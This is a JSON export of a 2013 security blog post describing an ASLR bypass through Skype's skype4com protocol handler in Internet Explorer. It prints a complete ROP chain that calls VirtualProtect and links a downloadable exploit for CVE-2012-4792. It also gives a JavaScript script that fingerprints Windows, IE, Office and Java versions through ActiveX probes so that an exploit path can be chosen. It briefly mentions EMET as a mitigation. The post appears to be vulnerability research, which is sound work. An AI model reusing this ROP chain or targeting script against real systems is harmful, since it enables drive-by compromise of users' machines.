{"id":641,"date":"2013-02-24T15:02:59","date_gmt":"2013-02-24T14:02:59","guid":{"rendered":"http:\/\/www.greyhathacker.net\/?p=641"},"modified":"2013-03-23T19:48:49","modified_gmt":"2013-03-23T18:48:49","slug":"bypassing-windows-aslr-using-skype4com-protocol-handler","status":"publish","type":"post","link":"https:\/\/www.greyhathacker.net\/?p=641","title":{"rendered":"Bypassing Windows ASLR using &#8220;skype4COM&#8221; protocol handler"},"content":{"rendered":"<p>While investigating an unrelated issue with the SysInternals Autoruns tool I spotted a couple of protocol handlers installed on the system by Skype. Knowing that protocol handlers can be loaded by Internet Explorer without any prompts, I decided to check whether these libraries have their dynamic base bits set. It turns out that the &#8220;skype4com.dll&#8221; library does not, which means it loads at its preferred base address every time and can be used to bypass Windows ASLR, so I got to work writing a ROP chain and testing it out.<\/p>\n<p><a href=\"\/images\/autorunskype.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" alt=\"\" src=\"\/images\/autorunskype.png\" width=\"522\" height=\"368\" \/><\/a><\/p>\n<p>A quick test to confirm that it actually loads can be done with the code below:<\/p>\n<pre>&lt;SCRIPT language=\"JavaScript\"&gt;\r\nlocation.href = 'skype4com:'\r\n&lt;\/SCRIPT&gt;<\/pre>\n<p><a href=\"\/images\/procskype.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" alt=\"\" src=\"\/images\/procskype.png\" width=\"525\" height=\"381\" \/><\/a><\/p>\n<pre>Filename - Skype4COM.dll\r\nPath     - C:\\Program Files\\Common Files\\Skype\\\r\nMD5 hash - 6e04c50ca4a3fa2cc812cd7ab84eb6d7\r\nSize     - 2,156,192 bytes\r\nSigned   - 03 November 2011 11:46:40\r\nVersion  - 1.0.38.0<\/pre>\n<p>and here is my ROP chain, which contains no null bytes:<\/p>\n<pre> 0x28025062   # POP EBX # RETN\r\n 0xa13fcde1   # 0xA13FCDE1\r\n 0x28024f71   # POP EAX # RETN\r\n 0x5ec03420   # 0x5EC03420\r\n 0x28027b5c   # ADD EBX,EAX # XOR EAX,EAX # RETN (EBX=0x201, 513 bytes)\r\n 0x28024f71   # POP EAX # RETN\r\n 0xa13fcde1   # 0xA13FCDE1\r\n 0x280b4654   # ADD EAX,5EC0325F # RETN\r\n 0x28099a83   # MOV EDX,EAX # MOV EAX,ESI # POP ESI # RETN (EDX=0x40)\r\n 0x41414141   # Compensate\r\n 0x28017271   # POP ECX # RETN\r\n 0x280de198   # VirtualProtect() pointer [IAT]\r\n 0x28027b5b   # MOV EAX,DWORD PTR DS:[ECX] # RETN\r\n 0x28041824   # XCHG EAX,ESI # ADD EAX,48C48300 # RETN 0x08\r\n 0x2806405a   # POP EBP # RETN\r\n 0x41414141   # Compensate\r\n 0x41414141   # Compensate\r\n 0x280bc55b   # &amp; push esp # ret\r\n 0x28017271   # POP ECX # RETN\r\n 0x28126717   # &amp;Writable location\r\n 0x28098730   # POP EDI # RETN\r\n 0x28098731   # RETN (ROP NOP)\r\n 0x28024f71   # POP EAX # RETN\r\n 0x90909090   # nop\r\n 0x28043527   # PUSHAD # RETN<\/pre>\n<p>I&#8217;ve created an exploit using this ROP chain for the &#8220;CButton Object Use-After-Free vulnerability&#8221; (CVE-2012-4792), taken from Metasploit. It has been tested on Windows 7 Enterprise (32-bit) in a VM with the latest version of Skype installed (6.2.59.106). The exploit can be downloaded from <a href=\"http:\/\/www.greyhathacker.net\/docs\/cve-2012-4792.zip\" target=\"_blank\">here<\/a>; the password is &#8220;exploit&#8221; and the MD5 hash of the zip file is 4d5735ff26b769abe1b02f74e2871911.<\/p>\n<p>Mitigation? Well I said it before and I&#8217;ll say it again . . . &#8220;EMET&#8221; your machines ASAP \ud83d\ude42 EMET&#8217;s Mandatory ASLR forces modules that were not linked with \/DYNAMICBASE, such as this one, to be relocated anyway, which takes away the fixed addresses a chain like the one above relies on.<\/p>\n<p>On something off topic, I was looking at the HTML code posted on <a href=\"http:\/\/pastebin.com\/PuM8GMeb\" target=\"_blank\">Pastebin<\/a> for the CVE-2012-4792 exploit and liked the way it checked whether Office 2010 or 2007 was installed. Some blog posts weren&#8217;t very clear about what the Office check routine was actually doing, but really it was just determining which hxds.dll version to use for its ROP chain, based on the Office version it detected. (I haven&#8217;t got the actual exploit files to confirm this, but I&#8217;m pretty sure.)<\/p>\n<p>For Office 2010 it installs 4 OpenDocuments ActiveX objects:<\/p>\n<p>SharePoint.OpenDocuments.4<br \/>\nSharePoint.OpenDocuments.3<br \/>\nSharePoint.OpenDocuments.2<br \/>\nSharePoint.OpenDocuments.1<\/p>\n<p>and Office 2007 only 3:<\/p>\n<p>SharePoint.OpenDocuments.3<br \/>\nSharePoint.OpenDocuments.2<br \/>\nSharePoint.OpenDocuments.1<\/p>\n<p>So if the JavaScript is able to instantiate &#8220;SharePoint.OpenDocuments.4&#8221;, it knows that it is dealing with Office 2010. Since these ActiveX controls can be run without permissions, no prompts are given. Below is a simple script that, in this example, checks whether a Windows 7 machine running IE8 has Office 2007\/2010 or Java 6 installed. Skype does not install any ActiveX controls that can be run without permissions, so I couldn&#8217;t work out how to check whether Skype is installed without triggering prompts in Internet Explorer. If you do know how to check without triggering prompts, please do share.<\/p>\n<pre>&lt;HTML&gt;\r\n&lt;SCRIPT language=\"JavaScript\"&gt;\r\n\/\/ Select a code path based on the OS\/browser first, then on which\r\n\/\/ plugin is present. Each ActiveX probe is wrapped in try\/catch, so a\r\n\/\/ missing control simply leaves the probe variable at its default.\r\nif (CheckIEOSVersion() == \"ie8w7\")\r\n{\r\n    if (CheckOfficeVersion() == \"Office2010\")\r\n    {\r\n\/\/      Exploit call here\r\n    }\r\n    else if (CheckOfficeVersion() == \"Office2007\")\r\n    {\r\n\/\/      Exploit call here\r\n    }\r\n    else if (JavaVersion() == \"Java6\")\r\n    {\r\n\/\/      Exploit call here\r\n    }\r\n    else if (SkypeCheck() == \"\")\r\n    {\r\n\/\/      Exploit call here\r\n    }\r\n}\r\n\r\n\/\/ Fingerprint the Windows and IE version from the user-agent string.\r\nfunction CheckIEOSVersion()\r\n{\r\n    var agent = navigator.userAgent.toUpperCase();\r\n    var os_ie_ver = \"\";\r\n\r\n    if ((agent.indexOf('NT 5.1') &gt; -1)&amp;&amp;(agent.indexOf('MSIE 7') &gt; -1))\r\n        os_ie_ver = \"ie7wxp\";\r\n    if ((agent.indexOf('NT 5.1') &gt; -1)&amp;&amp;(agent.indexOf('MSIE 8') &gt; -1))\r\n        os_ie_ver = \"ie8wxp\";\r\n    if ((agent.indexOf('NT 6.0') &gt; -1)&amp;&amp;(agent.indexOf('MSIE 7') &gt; -1))\r\n        os_ie_ver = \"ie7wv\";\r\n    if ((agent.indexOf('NT 6.0') &gt; -1)&amp;&amp;(agent.indexOf('MSIE 8') &gt; -1))\r\n        os_ie_ver = \"ie8wv\";\r\n    if ((agent.indexOf('NT 6.1') &gt; -1)&amp;&amp;(agent.indexOf('MSIE 8') &gt; -1))\r\n        os_ie_ver = \"ie8w7\";\r\n    if ((agent.indexOf('NT 6.1') &gt; -1)&amp;&amp;(agent.indexOf('MSIE 9') &gt; -1))\r\n        os_ie_ver = \"ie9w7\";\r\n    if ((agent.indexOf('NT 6.2') &gt; -1)&amp;&amp;(agent.indexOf('MSIE 10') &gt; -1))\r\n        os_ie_ver = \"ie10w8\";\r\n    return os_ie_ver;\r\n}\r\n\r\n\/\/ Office 2010 registers SharePoint.OpenDocuments.4; Office 2007 stops at .3.\r\n\/\/ A probe variable that is still a number means the control did not load.\r\nfunction CheckOfficeVersion()\r\n{\r\n    var offver = \"\";\r\n    var checka = 0;\r\n    var checkb = 0;\r\n\r\n    try {\r\n        checka = new ActiveXObject(\"SharePoint.OpenDocuments.4\");\r\n    } catch (e) {}\r\n    try {\r\n        checkb = new ActiveXObject(\"SharePoint.OpenDocuments.3\");\r\n    } catch (e) {}\r\n\r\n    if ((typeof checka) == \"object\" &amp;&amp; (typeof checkb) == \"object\")\r\n        offver = \"Office2010\";\r\n    else if ((typeof checka) == \"number\" &amp;&amp; (typeof checkb) == \"object\")\r\n        offver = \"Office2007\";\r\n\r\n    return offver;\r\n}\r\n\r\n\/\/ Probe the JavaWebStart.isInstalled.1.6.0.0 control to detect Java 6.\r\nfunction JavaVersion()\r\n{\r\n    var javver = \"\";\r\n    var javaa = 0;\r\n\r\n    try {\r\n        javaa = new ActiveXObject(\"JavaWebStart.isInstalled.1.6.0.0\");\r\n    } catch (e) {}\r\n\r\n    if ((typeof javaa) == \"object\")\r\n        javver = \"Java6\";\r\n\r\n    return javver;\r\n}\r\n\r\n\/\/ Placeholder: no prompt-free way to detect Skype was found, so this\r\n\/\/ always returns an empty string.\r\nfunction SkypeCheck()\r\n{\r\n    var skypever = \"\";\r\n    return skypever;\r\n}\r\n&lt;\/SCRIPT&gt;\r\n&lt;\/HTML&gt;<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>While investigating an unrelated issue with the SysInternals Autoruns tool I spotted a couple of protocol handlers installed on the system by Skype. Knowing that protocol handlers can be loaded by Internet Explorer without any prompts, I decided to check whether these libraries have their dynamic base bits set. It turns out that the &#8220;skype4com.dll&#8221; library [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[18,7,6],"tags":[38,32,41,12],"class_list":["post-641","post","type-post","status-publish","format-standard","hentry","category-all","category-exploits","category-vulnerabilities","tag-aslr","tag-rop","tag-skype","tag-uri"],"_links":{"self":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/641","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=641"}],"version-history":[{"count":27,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/641\/revisions"}],"predecessor-version":[{"id":703,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/641\/revisions\/703"}],"wp:attachment":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=641"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=641"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=641"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}